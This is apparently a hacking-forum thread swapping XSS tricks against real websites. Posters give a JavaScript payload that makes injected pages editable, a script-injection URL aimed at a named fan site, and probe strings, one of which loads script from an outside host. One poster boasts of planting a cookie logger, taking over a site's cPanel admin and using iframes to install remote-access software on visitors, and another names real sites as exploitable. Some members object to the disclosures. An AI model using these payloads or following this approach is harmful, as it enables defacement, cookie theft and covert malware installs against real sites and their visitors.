fun with xss

Here is a little fun you can have with xss. You can use javascript code: javascript: document.body.contentEditable ='true'; document.designMode='on'; void 0 (take out the space between javascript: documnet *damn smileys)

inside your xss statement. Anyone who visits the page you just xss'ed can now edit the page to there liking. *I know this is old code, and i know that lots of people know about it, but i have never heard of anyone injecting it into an xss attack. (have fun)

This is a pretty good idea.

anyways I was doing some xss testing and came across this…

http://www.estellegetty.com/fan_list/page.php?action=%3Cscript%3Ealert(%22yours31f%22);%3C/script%3E

I thought it was pretty funny.

Is this your mums site? :right:

nope. One of my friends ask me to help him see if it was secure. (i didn't do much btw si i don't know if it has any holes.)

Trying to deface a dead pensioners site man , tut tut.

nope, I was just helping to secure it. I was ask for help, and it will be fixed tomorrow.

Best fun ive ever had with XSS was iFrames. The XSS allowed me to chuck a cookie logger on the page. Then once I had admin cPanel I chucked iFrames all over it : ] If a site already has some activex on it then your in luck. Create an iFrame linking to you logmein vpn install software page. Then upon visiting a vnc is installed for you. Wow wasnt that easy. Ill draw up some code for it today. I got work at computer help now :ninja:

right now im just doing this

"> <script>alert("xssed");</script>

"</textarea> <script>alert("xssed");</script>

"><script src="http://yours31f.ulmb.com/xss.html"></script>

yours3lf, if you're talking about xssing the site you just posted, I don't think that is going to work (at least from ?page.php=xsshere). It looks like they are using switch case and the default case displays that error page. Good luck though Edit: i lied about the switch case. That is the default error message, but you still won't be able to xss it since it wont return the values back onto the page.

Dude , don't encourage him.

lol

You know its true :p

yours31f wrote: right now im just doing this

"> <script>alert("xssed");</script>

"</textarea> <script>alert("xssed");</script>

"><script src="http://yours31f.ulmb.com/xss.html"></script>

Go back to the cheat sheet and get some more ideas.

Most of the sites hosted by the Russian Information Network are pretty exploitable to XSS. There are quite a few of them, and even search.rin.ru, their main search engine, is exploitable. This is good for experimentally learning more about the exploit and how it can used for things other than creating alert boxes and stealing cookies. XSS is a powerful exploit that is often misused, attempt not to add on to the misuse.

:| You shouldn't put URLs if you're going to tell the community that they're vulnerable to some sort of attack…

Technically, I didn't post the URL. I only posted the host, which is one of many parts of a full URL. Despite this, I do understand what you are trying to say and I'll be more careful next time. :D

and the one I posted (as far as I know) is not.

Well you must not know much, because what you posted is a full fledged URL. Your last post was both pointless and incorrect. Make use of the time you spend writing pointless posts and read.

http://www.mattcutts.com/blog/seo-glossary-url-definitions/

Seriously, if only you'd use Google more often, you wouldn't be flamed as often.

HZ wrote: Well you must not know much, because what you posted is a full fledged URL. Your last post was both pointless and incorrect. Make use of the time you spend writing pointless posts and read.

http://www.mattcutts.com/blog/seo-glossary-url-definitions/

Seriously, if only you'd use Google more often, you wouldn't be flamed as often.

I think he was speaking of the fact that the URL he posted wasn't vulnerable.

Please, as a (new) member of this community, don't be so quick to flame other members of the community

thats exactly what i was saying.

Understood, but despite all of this, Google is still your best friend. :D

… Let it go.

Well that was a brilliant discussion about xss wasent it.